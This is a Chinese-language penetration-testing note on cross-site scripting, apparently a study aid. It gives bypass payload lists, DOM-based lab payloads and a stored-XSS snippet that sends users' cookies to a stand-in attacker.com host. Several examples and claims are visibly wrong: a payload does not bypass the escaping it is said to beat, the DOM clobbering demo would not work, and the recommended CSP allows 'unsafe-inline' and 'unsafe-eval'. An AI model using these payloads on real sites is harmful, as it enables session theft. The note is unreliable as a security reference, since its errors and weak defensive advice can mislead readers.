渗透笔记（XSS跨站脚本攻击）

一、XSS攻击概述

XSS（Cross-Site Scripting，跨站脚本攻击）是一种常见的Web安全漏洞，攻击者通过在目标网站上注入恶意脚本，当其他用户访问该页面时，脚本会在用户浏览器中执行，从而窃取用户数据、会话令牌或进行其他恶意操作。

二、XSS攻击类型

1. 反射型XSS（Reflected XSS）

原理：恶意脚本作为请求的一部分发送到服务器，服务器将脚本"反射"回响应中并在用户浏览器执行。

示例：

<!-- 假设存在漏洞的URL -->
https://example.com/search?q=<script>alert('XSS')</script>

<!-- 服务器响应可能包含 -->
<div>您搜索的结果：<script>alert('XSS')</script></div>

bypass技巧（以DVWA靶场为例）：

Level 1-11 常见绕过方法

• Level 1 ：直接注入<script>alert(1)</script>
• Level 2 ：使用事件处理程序<img src=x onerror=alert(1)>
• Level 3 ：利用URL编码<a href="javascript:alert(1)">click</a>
• Level 4 ：使用大小写混合<ScRiPt>alert(1)</ScRiPt>
• Level 5 ：利用HTML实体编码<script>alert(1)</script>
• Level 6 ：使用SVG标签<svg/onload=alert(1)>
• Level 7 ：利用JavaScript伪协议<iframe src="javascript:alert(1)">
• Level 8 ：使用Unicode编码<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
• Level 9 ：通过闭合现有标签</textarea><script>alert(1)</script>
• Level 10 ：利用CSS表达式<div style="x:expression(alert(1))">
• Level 11 ：使用HTML5新特性<details open ontoggle=alert(1)>

2. DOM型XSS（DOM-based XSS）

原理：完全在客户端发生的XSS攻击，恶意脚本通过修改DOM环境而非插入HTML代码来执行。

xss.pwnfunction靶场示例：

第一关：Ma Spagheti

// 漏洞代码
document.write(decodeURIComponent(location.hash.slice(1)));

// 攻击payload
https://xss.pwnfunction.com/ma-spagheti.html#<img src=x onerror=alert(1)>

第二关：JEFFFF

// 漏洞代码
document.getElementById('jeff').innerHTML = decodeURIComponent(location.hash.slice(1));

// 攻击payload
https://xss.pwnfunction.com/jeffff.html#<svg/onload=alert(1)>

第三关：Ugandan Knuckles

// 漏洞代码
eval('var x = "' + location.hash.slice(1) + '"');

// 攻击payload
https://xss.pwnfunction.com/ugandan-knuckles.html#";alert(1);//

第四关：Ricardo Milos

// 漏洞代码
document.querySelector('div').innerHTML = location.hash.slice(1).replace(/</g, '&lt;');

// 攻击payload（绕过HTML实体编码）
https://xss.pwnfunction.com/ricardo-milos.html#<img src=x onerror=alert(1)>

3. 存储型XSS（Stored XSS）

原理：恶意脚本被永久存储在目标服务器（如数据库、消息论坛、评论字段等），当其他用户访问受影响页面时自动执行。

示例：

<!-- 攻击者在评论区提交 -->
<script>
  fetch('https://attacker.com/steal?cookie='+document.cookie);
</script>

<!-- 其他用户访问该页面时会自动发送cookie到攻击者服务器 -->

三、高级XSS技术

1. 原型链污染（Prototype Pollution）

原理：通过修改JavaScript对象的原型链来污染基础对象，可能导致XSS漏洞。

示例：

// 漏洞代码
function merge(target, source) {
  for (let key in source) {
    if (typeof target[key] === 'object' && typeof source[key] === 'object') {
      merge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
}

// 攻击payload
const malicious = JSON.parse('{"__proto__": {"isAdmin": true}}');
merge({}, malicious);

// 现在所有对象都会继承isAdmin属性
console.log({}.isAdmin); // true

2. 基于DOM Clobbering的XSS

示例：

<!-- 通过DOM元素覆盖JavaScript变量 -->
<form id="xss"><input name="action" value="alert(1)"></form>
<script>
  // 原本的xss变量被DOM元素覆盖
  xss.action(); // 执行alert(1)
</script>

四、防御措施

1. 输入验证和过滤：

   • 使用白名单验证所有输入数据
   • 对特殊字符进行HTML实体编码

2. 输出编码：

   • 根据输出上下文使用适当的编码（HTML、JavaScript、URL等）

3. 内容安全策略（CSP）：

   Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'

4. HttpOnly Cookie：

   • 设置敏感cookie为HttpOnly，防止JavaScript访问

5. 使用现代框架：

   • React、Vue、Angular等框架有内置的XSS防护机制